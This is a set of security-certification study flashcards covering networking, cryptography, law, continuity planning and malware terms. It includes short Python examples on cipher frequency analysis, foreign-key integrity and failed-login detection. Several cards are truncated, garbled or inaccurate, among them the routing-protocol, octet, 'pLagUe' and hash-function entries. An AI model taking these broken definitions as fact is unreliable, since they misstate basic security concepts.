gives the tester no internal details: the software is treated as a black box that receives inputs

Simulation Test/Walkthrough Drill

goes beyond talking about the process and actually has teams carry out the recovery process.

Layer 2 - Data Link

handles access to the physical layer as well as local area network communication

Layer 4 - Transport

handles packet sequencing, flow control, and error detection. TCP and UDP are Layer 4 (Maintenance)

"Bad" blocks/clusters/sectors

hard disks routinely end up with sectors that cannot be read due to some physical defect. The sectors marked as bad will be ignored by the operating system since no data could be read in those defective portions

Coaxial

has an inner copper core ("D") separated by an insulator ("C"), with a plastic outer layer ("A")

Wet pipes

have water right up to the sprinkler heads. Bulbs come in different colors rated for different temperatures

Hand Geometry

The devices use a simple concept of measuring and recording the length, width, thickness, and surface area of an individual's hand

Perimeter Defenses

help prevent, detect, and correct unauthorized physical access. Ideal qualities; safe, prevents ingress, authentication and accountability.

Stealth virus

hides itself from the OS and other protective software, such as antivirus software

Accountability

holds users accountable for their actions

Octets 2,3,4

host

IPsec Architectures

host-to-gateway, gateway-to-gateway, and host-to-host.

Service Level Agreements (SLA)

identifies key expectations that the vendor is contractually required to meet. Primarily address availability

Sashimi Model

Highly overlapping steps; it can be thought of as a real-world successor to the Waterfall Model. Named after the Japanese delicacy sashimi, which has overlapping layers of fish.

Data Remanence

important to media sanitization and data destruction. Could refer to residual data that persists on magnetic storage.

Responsibilities(Policy)

include responsibilities of information security staff, policy and management teams, as well as responsibilities of all members of the organization.

Federal Interest Computer

includes government, critical infrastructure, or financial processing system.

Live forensics

includes taking a bit by bit, or binary image of physical memory, gathering details about running processes, and gathering network connection data.

Striping

increasing the read and write performance by spreading data across multiple hard disks

pLagUe{USA}

injects viruses into autorun.inf

Insiders

insider attack is launched by an internal user who may be authorized to use the system that is attacked.

Bytecode

intermediary form (converted from source code), but still must be converted into machine code before it may run on the CPU. Platform-independent code

Parallel Processing

involves recovery of critical processing components at an alternate computing facility.

Synthetic Transactions

involves building scripts or tools that simulate activities normally performed in an application. Ensure the application is still performing as expected

Mitigation

involves the process of understanding the cause of the incident so that the system can be reliably cleaned and ultimately restored to operational status later in the recovery phase.

Extranet

is a connection between private Intranets, such as connections to business partner Intranets

Free software

is a controversial term that is defined differently by different groups.

Kerberos

is a third-party authentication service that may be used to support Single Sign-On. AAA systems: authentication, authorization, and accountability. Main parts: the client, the KDC, and the server

Freeware

is free of charge to use

Outsourcing

is the use of a third party to provide Information Technology support services that were previously performed in-house. Enhances the information technology resources.

Certificate Authorities(CA)

issues digital certificates. May be private or public(VeriSign)

Rotation of Duties

job rotation or rotation of responsibilities, provides an organization with a means to help mitigate the risk associated with any one individual having too many privileges

Server-side attacks(service side)

launched directly from an attacker to a listening service. The "Conficker" worm of 2008 spread via a number of methods, including TCP port 445, exploiting a weakness in RPC. Defenses: patching, system hardening, firewalls, and other forms of defense in depth.

Criminal Law

laws where the victim can be seen as society itself. Maintain an orderly and law-abiding citizenry. The goal is to deter crime and punish offenders.

Network Attacks

leverage client-side attacks, server-side attacks, or Web application attacks

Public Key Infrastructure(PKI)

leverages all three forms of encryption to provide and manage digital certificates. The standard digital certificate format for PKI is X.509

CSRF

leverages third-party redirect of static content within the security context of a trusted site.

Modular Math

lies behind much of cryptography. Simply put, modular math shows you what remains (the remainder) after division. Called "clock math"

Certificate Revocation List(CRL)

lists certificates that have been revoked.

Payment Card Industry Data Security Standard (PCI-DSS)

major vendors in payment card portion of the financial industry. Ensure better protection of cardholder data through mandating security policy, security devices, control techniques, and monitoring of systems of cardholder data.

Static NAT

makes a one-to-one translation between addresses

Zero-Day Exploits

malicious code for which there is no existing vendor-supplied patch.

Logic Bomb

malicious program that is triggered when a logical condition is met, such as after a number of transactions have been processed, or on a specific date/time.

Computer viruses

malware that does not spread automatically: require catalyst(human)

Trojan

malware that performs two functions. One benign(obfuscation), one malicious.

Worms

malware that self-propagates

Data processors

manage data on behalf of data controllers. An outsourced payroll company is an example of a data processor.

Layer 5 - Session

manages sessions, which provide maintenance on connections. (Maintenance)

Harrison- Ruzzo-Ullman Model

maps subjects, objects, and access rights to an access matrix. It is considered a variation of the Graham-Denning Model. Six primitive operations: create object, create subject, destroy subject, destroy object, enter right into access matrix, delete right from access matrix.

Biometrics

may be used to establish an identity, or to authenticate (prove an identity claim) Eg: Airport Facial Recognition

Packet Switched Networks

may use Quality of Service (QoS) to give specific traffic precedence over other traffic. QoS is often applied to Voice Over IP (VoIP). Avoids Interruption

Entity integrity

means each tuple has a unique primary key that is not null.

Convergence

means that all routers on a network agree on the state of routing

Dedicated(Mode of Operation)

means that the system contains objects of one classification label. Subjects must have equivalent clearance as objects. All subjects must possess a clearance equal to or greater than the label of objects.

Parity

means to achieve data redundancy without incurring the same degree of cost as that of mirroring in terms of disk usage and write performance.

Voiceprint

measures the subject's tone of voice while stating a specific sentence or phrase

Configuration Item Identification

methodology for selecting and naming configuration items that need to be placed under CM

Database replication

mirrors a live database allowing simultaneous reads and writes to multiple replicated databases by clients

Technical Controls

mitigate infected mobile computers and devices.

Host-to-host(IPsec)

mode connects two systems (such as file servers) to each other via IPsec

Protocol Behavior IDS

models the way protocols should work, often by analyzing RFCs (Request for Comments). RFC 793 describes TCP flags

FRR preferred over FAR

most organizations would prefer rejecting authentic subjects to accepting impostors

Clipper Chip

name of tech used in Escrowed Encryption Standard(EES), announced in 1993 by US Gov. Used Skipjack algorithm. Symmetric cipher that uses an 80 bit key. Originally a secret algorithm.

Network Stack

network protocol suite programmed in software or hardware

Baseband

networks that have one channel and can only send one signal at a time.

Ignorance of the Law

never an excuse for breaking the law.

Read Only Memory(ROM)

nonvolatile memory that maintains integrity after loss of power

Inference and Aggregation

occur when a user is able to use lower level access to learn restricted information.

Access aggregation

occurs as individual users gain more access to more systems

Reading Down

occurs when a subject reads an object at a lower sensitivity level. Ex: a Top Secret subject reading a Secret object. Subject reads down; data flows up.

Metasploit

open source Penetration Testing Tool

Public Cloud Computing

outsources IT infrastructure, storage, or applications to a third-party provider. Cloud computing provides Infrastructure as a Service (IaaS, eg: Linux Server Hosting), Software as a Service (SaaS, eg: Web Service Hosting), Platform as a Service (PaaS, eg: Web Mail).

Offshoring

outsourcing to another country. Can raise privacy and regulatory issues.

Frame Relay

packet-switched Layer 2 WAN protocol that provides no error recovery and focuses on speed

Administrative Countermeasures

policies, procedures, guidelines, standards.

Allocated space

portions of a disk partition that are marked as actively containing data

Unallocated space

portions of a disk partition that do not contain active data

Financial Damages: Statutory

prescribed by law, which can be awarded to the victim even if the victim incurred no actual loss or injury.

Separation of duties

prescribes that multiple people are required to complete critical or sensitive transactions

CO2

removing oxygen smothers fires

Configuration Monitoring

process for assessing or testing the level of compliance with the established baseline configuration and mechanisms for reporting on the configuration status of items placed under CM

Configuration Change Control

process for managing updates to the baseline configurations for the configuration items

Patch Management

process of managing software updates. All software has flaws or shortcomings that are not fully addressed in advance of being released

Protocol Governance

process of selecting the right method (cipher) and implementation

Brownout

prolonged low voltage

Generators

protect against electrical failures. Designed to provide power for longer periods of time. Always place generators above potential flooding areas

Transport Mode

protects the IP data (layers 4-7) only, leaving the original IP headers unprotected. Both modes add extra IPsec headers

Secure Hardware Architecture must...

provide confidentiality, integrity, and availability for processes, data, users.

Circuit-switched networks

provide dedicated bandwidth to point-to-point connections, such as a T1. Being dedicated to a single purpose is a drawback

Kerberos Strength

provides mutual authentication. Mitigates replay attacks.

Packers

provide runtime compression of executables

Software Change and Configuration Management

provides a framework for managing changes to software as it is developed, maintained, and eventually retired.

Network Tap

provides a way to "tap" into network traffic. NIDS. Can "fail open"

SubBytes

provides confusion by substituting the bytes of the state according to a substitution table. Example: take the byte of the state to be substituted, "T"; if T is hex 53, look up row 5 (X) and column 3 (Y) in the table

Mix Columns

provides diffusion by mixing via finite field mathematics

Hash Function

provides encryption using an algorithm and no key. One-way hash functions. Plaintext changes to a fixed message length. Weaknesses found in both MD5 and SHA1

Full-Knowledge Test/ Crystal Box

provides internal information to the penetration tester, including network diagrams, policies and procedures, and sometimes reports from previous penetration testers

Zachman Framework for Enterprise Architecture

provides six frameworks for providing information security, asking what, how, where, who, when, and why, and mapping those frameworks across roles including planner, owner, designer, builder, programmer, and user.

Authentication

proving an identity claim

Virtual SAN

provisioning of virtualized storage

Asymmetric Encryption

public key, private key. Encrypt public, Decrypt private

Open source

publishes source code publicly. Ubuntu, Apache

MTBF

quantifies how long a new or repaired system will run before failing

Mean Time Between Failures

quantifies how long a new or repaired system will run on average before failing

Assurance correctness

ranges from E0 (inadequate) to E6 (formal model of security policy); functionality ratings include TCSEC-equivalent ratings (F-C1, F-C2, etc.)

Layer 2 Broadcast Traffic

reaches all nodes in a "broadcast domain."

Warm Site

readily accessible hardware and connectivity, but it will have to rely upon backup data in order to reconstitute a system after a disruption.

Benefits of Cloud

reduced upfront capital expenditure, reduced maintenance costs, robust levels of service, and overall operational cost savings.

Password cracking

refers to an offline technique in which the attacker has gained access to the password hashes or database

Keyboard dynamics

refers to how hard a person presses each key and the rhythm by which the keys are pressed

Static analysis

reviews the raw source code itself looking for evidence of known insecure practices, functions, libraries, or other characteristics having been used in the source code

Vulnerability scanning

scans a network or system for a list of predefined vulnerabilities such as system misconfiguration, outdated software, or a lack of patching.

Data mining

searches large amounts of data to determine patterns that would otherwise get lost in the noise. Credit card issuers are experts in data mining. "X or more purchases, in Y time, in Z places."

Level 1 Cache

second fastest form of cache memory, located on the CPU itself

VPN

secures data sent via insecure networks such as the Internet.

Dynamic testing

security checks are performed while actually running or executing the code or application under review

Chaining

seeds the previous encrypted block into the next block to be encrypted, destroying patterns in the resulting ciphertext

Denial of Service(DoS) Attack

seeks to deny service(or availability) of a system

Database normalization

seeks to make the data in a database table logically concise, organized, and consistent.

Integrity

seeks to prevent unauthorized modification of information. In other words, integrity seeks to prevent unauthorized write access. Ensure data accuracy and completeness

System Integrity

seeks to protect a system, such as a Windows 2008 server operating system.

Data Integrity

seeks to protect information against unauthorized modification

Ping

sends an ICMP Echo Request to a node and listens for an ICMP Echo Reply

Sensitive but Unclassified

sensitive data that is not a matter of national security

Time Multiplexing

shares system resources between multiple processes, each with a dedicated slice of time.

Electrical Fault

short- and long-term interruption of power. Impacts availability and integrity. Sudden loss of power can damage disks

Backdoors

shortcuts in a system that allow a user to bypass security checks (such as username/password authentication) to log in

Common Law

places significant emphasis on particular cases and judicial precedents as determinants of the law, though a legislative body is typically also tasked with the creation of new statutes and laws.

Deluge

similar to dry pipes, except the sprinkler heads are open and larger than dry pipe heads.

Machine code

software that is executed directly by the CPU

Hacktivist

someone who hacks for political reasons. Example: Vietnamese DDoS.

Monoalphabetic Cipher

each plaintext letter is always substituted with the same specific ciphertext letter. Because the mapping never changes, letter frequencies survive encryption and the cipher falls to frequency analysis.
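
A worked example of the card above, added here and not part of the original study set: a keyword-mixed monoalphabetic substitution, and the frequency-analysis attack that recovers the most common letters of the key. The keyword, the sample passage and the ETAOIN ordering are constructed inputs chosen for illustration.

```python
"""Monoalphabetic substitution and why it fails: every plaintext letter maps
to one fixed ciphertext letter, so letter frequencies survive encryption.
Added example; the keyword and sample text below are constructed."""
import string
from collections import Counter

ALPHA = string.ascii_uppercase
# English letters from most to least frequent (standard ETAOIN ordering)
ENGLISH_BY_FREQ = "ETAOINSHRDLCUMWFGYPBVKJXQZ"

# Constructed sample passage, deliberately rich in E and T.
SAMPLE_TEXT = (
    "SECURITY ENGINEERS NEED TO SEE THE PATTERNS THAT SUBSTITUTION CIPHERS "
    "LEAVE BEHIND. THE LETTER E IS THE MOST FREQUENT LETTER IN ENGLISH TEXT "
    "AND THE LETTER T IS THE NEXT. THESE FREQUENCIES SURVIVE ENCRYPTION "
    "BECAUSE EACH LETTER IS ALWAYS REPLACED BY THE SAME LETTER."
)


def make_key(keyword: str) -> str:
    """Keyword-mixed alphabet: keyword letters first (duplicates removed),
    then the remaining letters in order. key[i] is the cipher letter for ALPHA[i]."""
    seen = []
    for ch in keyword.upper() + ALPHA:
        if ch in ALPHA and ch not in seen:
            seen.append(ch)
    return "".join(seen)


def encrypt(plaintext: str, key: str) -> str:
    return plaintext.upper().translate(str.maketrans(ALPHA, key))


def decrypt(ciphertext: str, key: str) -> str:
    return ciphertext.upper().translate(str.maketrans(key, ALPHA))


def guess_key_by_frequency(ciphertext: str) -> str:
    """Rank ciphertext letters by frequency and pair them with ENGLISH_BY_FREQ.
    Returns a candidate key in the same layout make_key() produces. Only the
    high-frequency positions (E, T, ...) are reliable on short texts; the
    rest is refined by hand from digraphs and partial words."""
    counts = Counter(c for c in ciphertext.upper() if c in ALPHA)
    ranked = [c for c, _ in counts.most_common()]
    ranked += [c for c in ALPHA if c not in ranked]  # letters never observed
    mapping = dict(zip(ENGLISH_BY_FREQ, ranked))  # plaintext letter -> cipher letter
    return "".join(mapping[p] for p in ALPHA)


if __name__ == "__main__":
    key = make_key("SECURITY")
    ct = encrypt(SAMPLE_TEXT, key)
    guess = guess_key_by_frequency(ct)
    for p in "ET":
        print(p, "really ->", key[ALPHA.index(p)], "guessed ->", guess[ALPHA.index(p)])
```

The attack does not need the keyword: the two most frequent ciphertext letters are assumed to be E and T, which is enough to start peeling the rest of the alphabet off by hand.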

Kerberos Weakness

the KDC stores the keys of all principals (clients and servers), so its compromise exposes every key; the KDC and TGS are single points of failure.

Network Forensics

study of data in motion, with special focus on gathering evidence via a process that will support admission into court

Sequential Memory

such as tape, must be read sequentially, beginning at offset zero, until the desired portion of memory is reached.

Button locks

susceptible to brute force and shoulder surfing

RC5, RC6

symmetric block cipher by RSA. Uses 32, 64, or 128 bit blocks. Key size ranges from zero to 2040 bits.

Blowfish and Twofish

symmetric block ciphers created by Bruce Schneier. Blowfish uses 32- through 448-bit keys to encrypt 64-bit blocks. Twofish, its successor, uses 128-bit blocks with 128-, 192-, or 256-bit keys and was an AES finalist.

Redundant Systems

if system availability is extremely important, it may be prudent to keep entire spare systems in inventory.

Mandatory Access Control

system-enforced access control based on subject's clearances and object's labels

Dry pipe

systems also have closed sprinkler heads; the difference from wet pipe systems is that the pipes are filled with compressed air, and water enters only after a head opens.

Redundant Hardware

systems or devices that have redundant onboard power in the event of a power supply failure.

Recovery Controls

taken in order to restore functionality of the system and organization.

Hardware Segmentation

takes process isolation further by mapping processes to specific memory locations enforced in hardware, so one process cannot reach another process's memory.

Spike

temporary high voltage

Sag

temporary low voltage

Preparation

steps taken before an incident occurs. Training, writing incident response policies.

Teraflop

one trillion floating-point operations per second; a measure of computing throughput.

Direct Evidence

testimony provided by a witness regarding what the witness actually experienced with her five senses.

Read-Through

testing lists all necessary components required for successful recovery, and ensures that they are, or will be, readily available should a disaster occur.

Acceptance Testing

testing to ensure the software meets the customer's operational requirements

Referential integrity

ensures that every foreign key in a secondary (child) table matches a primary key in the parent table, so no row refers to a record that does not exist.
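
An added example, not from the original study set, showing referential integrity enforced by a foreign key and the caveat a practitioner runs into: SQLite, bundled with Python, does not enforce foreign keys unless `PRAGMA foreign_keys = ON` is issued on each connection. The schema and rows are constructed for illustration.

```python
"""Referential integrity via a foreign key, using Python's bundled sqlite3.
Added example; tables and rows are constructed. Shows both the lax default
(orphans accepted) and the enforced mode (orphans and dangling deletes rejected)."""
import sqlite3

SCHEMA = """
CREATE TABLE department (
    dept_id INTEGER PRIMARY KEY,
    name    TEXT NOT NULL
);
CREATE TABLE employee (
    emp_id  INTEGER PRIMARY KEY,
    name    TEXT NOT NULL,
    dept_id INTEGER NOT NULL REFERENCES department(dept_id)  -- the foreign key
);
INSERT INTO department VALUES (1, 'Security'), (2, 'Finance');
INSERT INTO employee VALUES (10, 'alice', 1), (11, 'bob', 2);
"""


def open_db(enforce_fk: bool) -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    if enforce_fk:
        conn.execute("PRAGMA foreign_keys = ON")  # off by default in SQLite
    conn.executescript(SCHEMA)
    return conn


def insert_orphan(conn: sqlite3.Connection) -> bool:
    """Reference a department that does not exist. Returns True if the row was
    accepted, i.e. referential integrity was NOT enforced."""
    try:
        conn.execute("INSERT INTO employee VALUES (12, 'mallory', 99)")
        return True
    except sqlite3.IntegrityError:
        return False


def delete_parent(conn: sqlite3.Connection) -> bool:
    """Delete a department that still has employees. Returns True if allowed."""
    try:
        conn.execute("DELETE FROM department WHERE dept_id = 1")
        return True
    except sqlite3.IntegrityError:
        return False


def orphan_count(conn: sqlite3.Connection) -> int:
    """Audit query: employees whose dept_id matches no department row."""
    row = conn.execute(
        "SELECT COUNT(*) FROM employee e "
        "LEFT JOIN department d ON d.dept_id = e.dept_id "
        "WHERE d.dept_id IS NULL"
    ).fetchone()
    return row[0]


if __name__ == "__main__":
    lax = open_db(enforce_fk=False)
    print("lax: orphan accepted =", insert_orphan(lax), "orphans =", orphan_count(lax))
    strict = open_db(enforce_fk=True)
    print("strict: orphan accepted =", insert_orphan(strict), "orphans =", orphan_count(strict))
```

The audit query in `orphan_count` is the check to run on a database that was populated before enforcement was switched on: enabling the pragma does not retroactively clean up orphans that already exist.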

Accountability

the ability to audit a system and demonstrate the actions of subjects

Electronic Vaulting

the batch process of electronically transmitting data that is to be backed up on a routine, regularly scheduled time interval

Accreditation

the data owner's acceptance of the certification, and of the residual risk, which is required before the system is put into production.

Evaluation Assurance Level (EAL)

the evaluation score of the tested product or system

Business Impact Analysis (BIA)

the formal method for determining how a disruption to the IT system(s) of an organization will impact the organization's requirements, processes, and interdependencies with respect to the business mission.

Walkthrough/Tabletop

the goal is to allow individuals who are knowledgeable about the systems and services targeted for recovery to thoroughly review the overall approach

Log Reviews

the goal is to review logs to ensure they can support information security as effectively as possible

Cold Site

the least expensive recovery solution to implement. It does not include backup copies of data, nor does it contain any immediately available hardware.

Zero-Knowledge Test.

the penetration tester begins with no external or trusted information

Confusion

the relationship between the plaintext and ciphertext should be as confused (random) as possible, so that a change in one is not predictably reflected in the other.

Response

the point at which the incident response team begins interacting with affected systems and attempts to keep further damage from occurring as a result of the incident

Mandatory Leave/Forced Vacation

the primary security considerations are similar to that addressed by rotation of duties. Forcing all employees to take leave can identify areas where depth of coverage is lacking

Tailoring

the process of customizing a standard for an organization. Begins with controls selection, continues with scoping, and finishes with the application of compensating controls.

System High

the system contains objects of mixed labels (e.g., confidential, secret, and top secret). All subjects must possess a clearance equal to or greater than the highest label on the system, though not necessarily need-to-know for all objects.

Certification

the system has been certified to meet the security requirements of the data owner.

Activate Team

the team that will be responsible for recovery needs to be activated.

Collusion

the term used for the two parties conspiring to undermine the security of the transaction

Total Cost of Ownership(TCO)

the total cost of a mitigating safeguard. TCO combines upfront costs plus annual cost of maintenance, staff hours, fees, etc.

Routing Protocol Goal

to automatically learn a network topology, and learn the best routes between all network points

Information Security Professional Mission

to balance the needs of confidentiality, integrity, and availability, and make trade-offs as needed.

High Availability

to decrease the recovery time of a system or network device so that the availability of the service is less impacted than would be by having to rebuild, reconfigure, or otherwise stand up a replacement system

Scoping

to define exactly what assets are protected by the plan (BCP), which emergency events this plan will be able to address, and finally determining the resources necessary to completely create and implement the plan

Vendor Governance

to ensure that a business is continually getting sufficient quality from its third-party providers

Reconstitution

to successfully recover critical business operations either at primary or secondary site

Change Management

to understand, communicate, and document any changes with the primary goal of being able to understand, control, and avoid direct or indirect negative impact that the change might impose

Object Encapsulation

treats a process as a black box.

Twisted Pair Cabling

twisting the pairs of wires together cancels most of the induced magnetic interference, making the cable less susceptible to EMI. Cable categories run from Cat 1 through Cat 6; data-network use begins at Cat 3 (10BASE-T).

NIST Special Publication 800-128

Guide for Security-Focused Configuration Management of Information Systems

Trademark dilution

unintentional attack in which the trademarked brand name is used to refer to the larger general class of products, e.g., Kleenex for facial tissue.

Biometric controls

must be usable by all staff, or compensating controls must exist. Potential exchange of bodily fluids on shared readers is a serious negative for any biometric control (the same reason airport bathrooms avoid door handles).

Distance Vector Routing Protocols

use

Synchronous dynamic tokens

use time or counters to synchronize a displayed token code with the code expected by the authentication server, e.g., a bank's text-message code.

One-time passwords

used for a single authentication. They are very secure but difficult to manage

Initialization Vector

a block of random data mixed into the first plaintext block in chained symmetric ciphers, so that the same plaintext encrypted twice under the same key produces different ciphertext. The IV need not be secret, but it must not be reused with the same key.

Clipping levels

used to differentiate between malicious attacks and normal users accidentally mistyping their passwords. Defines a minimum reporting threshold, e.g., alert only after five failed logins for one account within a set time window.
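
An added example, not from the original study set, of a clipping level applied as detection logic over authentication logs. The log lines are constructed to mimic sshd syslog output and are not real data; the threshold and window values are this example's own defaults.

```python
"""Clipping-level check over authentication log lines: count failed logins
per user inside a sliding window and report only once the count reaches the
threshold, so a user who mistypes once or twice is ignored while a
password-guessing run is not. Added example; SAMPLE_LOG is constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[101]: Failed password for alice from 10.0.0.5 port 4001 ssh2
Mar  3 10:00:40 host sshd[102]: Accepted password for alice from 10.0.0.5 port 4002 ssh2
Mar  3 10:01:00 host sshd[103]: Failed password for bob from 198.51.100.7 port 5001 ssh2
Mar  3 10:01:02 host sshd[104]: Failed password for bob from 198.51.100.7 port 5002 ssh2
Mar  3 10:01:04 host sshd[105]: Failed password for bob from 198.51.100.7 port 5003 ssh2
Mar  3 10:01:06 host sshd[106]: Failed password for bob from 198.51.100.7 port 5004 ssh2
Mar  3 10:01:08 host sshd[107]: Failed password for bob from 198.51.100.7 port 5005 ssh2
Mar  3 10:20:00 host sshd[108]: Failed password for carol from 10.0.0.9 port 6001 ssh2
Mar  3 10:35:00 host sshd[109]: Failed password for carol from 10.0.0.9 port 6002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?P<user>\S+) from (?P<ip>\S+)"
)


def parse(log_text: str, year: int = 2024):
    """Yield (timestamp, result, user, ip) for each matching line. Syslog omits
    the year, so the caller supplies it."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = " ".join(m["ts"].split())  # collapse the double space in "Mar  3"
        when = datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")
        yield when, m["result"], m["user"], m["ip"]


def find_violations(log_text: str, threshold: int = 5,
                    window_seconds: int = 300, year: int = 2024) -> list:
    """Return one alert each time `threshold` failures for a user fall within
    `window_seconds`. A successful login resets that user's count."""
    recent = defaultdict(deque)  # user -> timestamps of recent failures
    alerts = []
    for when, result, user, ip in parse(log_text, year):
        q = recent[user]
        if result == "Accepted":
            q.clear()
            continue
        q.append(when)
        while q and (when - q[0]).total_seconds() > window_seconds:
            q.popleft()  # failures that aged out of the window no longer count
        if len(q) >= threshold:
            alerts.append({"user": user, "source": ip, "count": len(q),
                           "at": when.isoformat()})
            q.clear()  # report once, then start counting afresh
    return alerts


if __name__ == "__main__":
    for alert in find_violations(SAMPLE_LOG):
        print(alert)
```

With the defaults only bob's burst of five failures in eight seconds is reported; alice's single typo and carol's two failures fifteen minutes apart stay below the clipping level. Lowering the threshold or widening the window trades the noise of false alarms against slower, "low and slow" guessing.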

Symmetric Encryption

uses one key to encrypt and decrypt. Usually shared out-of-band such as face-to-face. Also called "Secret key" encryption.

Closed System

uses only proprietary hardware or software.

Open System

uses open hardware and standards, using standard components from a variety of vendors. An IBM-compatible PC is an Open system.

Social Engineering

uses the human mind to bypass security controls.

Proprietary software

usually copyrighted and possibly patented

TTL field

every time a packet passes through a router, the router decrements the TTL field. When it reaches 0 the router drops the packet and sends an ICMP Time Exceeded message back to the source; traceroute relies on this behavior.

Multipartite

virus that spreads via multiple vectors

Random Access Memory(RAM)

volatile hardware memory that loses integrity after loss of power

SanDisk Secure Erase Command

when command is executed all blocks in the physical address space, whether they are currently or previously allocated to the logical space, are completely erased.

Differential

backs up any files that have changed since the last full backup. Example: for Monday's differential backup, only files changed since Sunday's full backup are archived, and each later differential grows until the next full backup.

Dry Powder

works by lowering temperature and smothering the fire, starving it of oxygen.

OWASP Enterprise Security API Toolkits

• Authentication • Access control • Input validation • Output encoding/escaping • Cryptography • Error handling and logging • Communication security • HTTP security • Security configuration

Applications

• Client requests and server responses • Usage information • Significant operational actions

Change Management Process

• Identifying a change • Proposing a change • Assessing the risk associated with the change • Testing the change • Scheduling the change • Notifying impacted parties of the change • Implementing the change • Reporting results of the change implementation Changes must be auditable

BCP/DRP Mistakes

• Lack of management support • Lack of business unit involvement • Lack of prioritization among critical staff • Improper (often overly narrow) scope • Inadequate telecommunications management • Inadequate supply chain management • Incomplete or inadequate crisis management plan • Lack of testing • Lack of training and awareness • Failure to keep the BCP/DRP plan up to date

Kerberos Components

• Principal: Client (user) or service • Realm: A logical Kerberos network • Ticket: Data that authenticates a principal's identity • Credentials: a ticket and a service key • KDC: Key Distribution Center, which authenticates principals • TGS: Ticket Granting Service • TGT: Ticket Granting Ticket • C/S: Client/Server, regarding communications between the two

Snort Active Response Rules

• reset_dest: send TCP RST to destination • reset_source: send TCP RST to source • reset_both: send TCP RST to both the source and destination • icmp_net: send ICMP network unreachable to source • icmp_host: send ICMP host unreachable to source • icmp_port: send ICMP port unreachable to source • icmp_all: send ICMP network, host and port unreachable to source

Individual Participation Principle

1. Able to find out if an entity holds any of their personal info 2. Made aware of any personal information being held 3. Given a reason for any denials to account for personal data being held 4. Able to challenge the content of any personal data being held.

Best Evidence rule

Original documents are preferred over copies. conclusive, tangible objects are preferred over oral testimony.

Color of law

Acting under the guise of, or on behalf of, law enforcement, e.g., an information security professional acting under the color of law when collecting evidence at police direction.

Computer as a Tool

Crimes where the computer is a central component enabling the commission of the crime. Compromising database server, leveraging computers to steal cardholders data.

Burden of Proof

Criminal: beyond reasonable doubt Civil: preponderance of the evidence

Copyright Act of 1976

Criteria to determine whether a use would be covered by the fair use doctrine: the purpose and style of the excerpt, the nature of the copyrighted work, the amount of content

Evidence

Information Security Professionals should attempt to provide all evidence, regardless of whether that evidence proves or disproves the facts of the case.

***EXAM WARNING***

Keep it simple on the exam: classify every example by asking whether it is a subject (an active entity such as a user or process) or an object (a passive entity such as a file).

Gross Negligence

Opposite of due care. Absence of due care. Legally important concept.

Collection Limitation Principle

There should be limits to the collection of personal data; it should be obtained by lawful and fair means and, unless there is a compelling reason to the contrary, with the knowledge or consent of the data subject.

Data Quality Principle

Personal data should be complete, accurate, and maintained in a fashion consistent with the purposes for the data collection.

Authentication

Proving an identity claim. You authenticate the identity claim by supplying information or objects only you would possess, e.g., a driver's license or a password.

Risk

a matched threat and vulnerability

Safeguard

a measure taken to reduce risk

Threat

a potentially negative occurrence

Counterfeiting

attempting to pass off a product as if it were the original branded product.

Hearsay Evidence

constitutes second-hand evidence. As opposed to direct evidence, which someone has witnessed with her five senses, hearsay involves indirect information. Generally inadmissible under Rule 802 of the Federal Rules of Evidence. Business and computer-generated records are technically hearsay but are commonly admitted under the business records exception (Rule 803(6)).

Privacy Act of 1974

created to codify protection of US citizens' data that is being used by the federal government. Act defined guidelines regarding how US citizens' PII would be used, collected, and distributed

Intellectual Property Law

intangible property that resulted from a creative act. Control the use of intangible property that can often be trivial to reproduce or abuse once made public or known.

Non-repudiation

means a user cannot deny(repudiate) having performed a transaction. Combination of authentication, and integrity. Non-repudiation authenticates the identity of a user and ensures the integrity.

Least Privilege

means users should be granted the minimum amount of access (authorization) required to do their jobs, but no more.

Patent

provides a monopoly to the patent holder on the right to use, make, or sell an invention for a period of time, in exchange for the patent holder making the invention public.

Financial Damages: Compensatory

provide the victim with a financial award in effort to compensate for the loss or injury incurred as a direct result of the wrongdoing.

Due Care

provides a framework that helps to define minimum standard of protection that business stakeholders must attempt to achieve.

Corroborative Evidence

provides additional support for a fact that might have been called into question.

Financial Damages: Punitive

punish an individual or organization. Damages are typically awarded to attempt to discourage a particularly egregious violation where the compensatory and statutory damages alone would not act as a deterrent.

Copyright

represents a type of intellectual property that protects the form of expression in artistic, musical, or literary works, and is typically denoted by the circle-c symbol. Purpose is to preclude unauthorized duplication, distribution, or modification. Term in the US is generally the author's life plus 70 years.

Transborder Flows of Personal Data(1980)

OECD guideline covering personal data that moves between countries: such flows should remain protected at the level the guidelines require, and member countries should avoid restricting them except where the receiving country does not observe the guidelines.

Authorization

the actions you can perform on system once you have been identified and authenticated. Actions i.e. reading, writing, executing files or programs.

Total Cost of Ownership

the cost of a safeguard

Annualized Loss Expectancy(ALE)

the cost of loss due to a risk over a year

Accountability Principle

the entity using the personal data should be accountable for adhering to the principles above.

Openness Principle

the general policy concerning collection and use of personal data should be readily available

Civil Law

the most common of the major legal systems. judicial precedents and particular case rulings do not carry the weight they do under common law.

Purpose Specification Principle

the purpose for the data collection should be known, and the subsequent use of the data should be limited to the purposes outlined at the time of collection.

